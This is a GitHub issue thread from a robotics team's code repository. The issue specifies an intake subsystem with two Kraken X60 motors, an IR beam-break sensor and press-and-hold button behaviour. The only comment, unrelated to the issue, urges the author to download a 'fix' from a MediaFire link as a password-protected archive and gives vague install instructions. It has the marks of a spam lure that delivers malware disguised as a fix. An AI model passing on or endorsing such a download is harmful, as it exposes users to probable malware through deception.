### ISSUE TITLE
Intake Subsystem

### ISSUE THREAD

**Issue by ElliotScher** [Team-190/2k24-Offseason-Code#1]
**Hardware:**
- 2x Kraken X60 motors (non-pro)
- 1x IR Digital Sensor

**Details:**
- Each motor controls a different roller on the intake, The rollers will spin in opposite directions on the top and bottom to bring notes into the robot.
- The sensor is an IR receiver. An IR emitter will be sending out a beam of infrared light which will be detected by the receiver. This beam of light will cross through the intake, such that when a note comes into the robot, it breaks the beam and the receiver detects that the beam of light is no longer there. This is used to detect when we have possession of a note.

**Desired Behavior:**
- Button to spin the intake inward to the robot. Press and Hold.
- Button to spin the intake outward away from the robot. Press and Hold.
- When the sensor detects the robot has a note, stop the intake and prevent it from spinning inwards.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
